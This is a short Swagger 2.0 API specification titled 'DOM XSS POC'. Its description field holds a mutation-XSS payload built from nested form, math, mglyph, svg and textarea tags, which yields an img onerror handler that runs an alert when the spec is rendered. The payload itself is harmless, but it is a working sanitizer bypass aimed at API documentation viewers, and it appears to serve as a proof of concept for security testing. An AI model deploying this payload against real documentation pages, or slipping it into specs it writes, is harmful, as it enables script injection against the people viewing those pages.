swagger: '2.0'
info:
  title: DOM XSS POC 
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('XSS is working') src=1>"></form>
paths:
  /XSS-Test:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - XSS
      operationId: findXSS
      summary: Finds all XSSs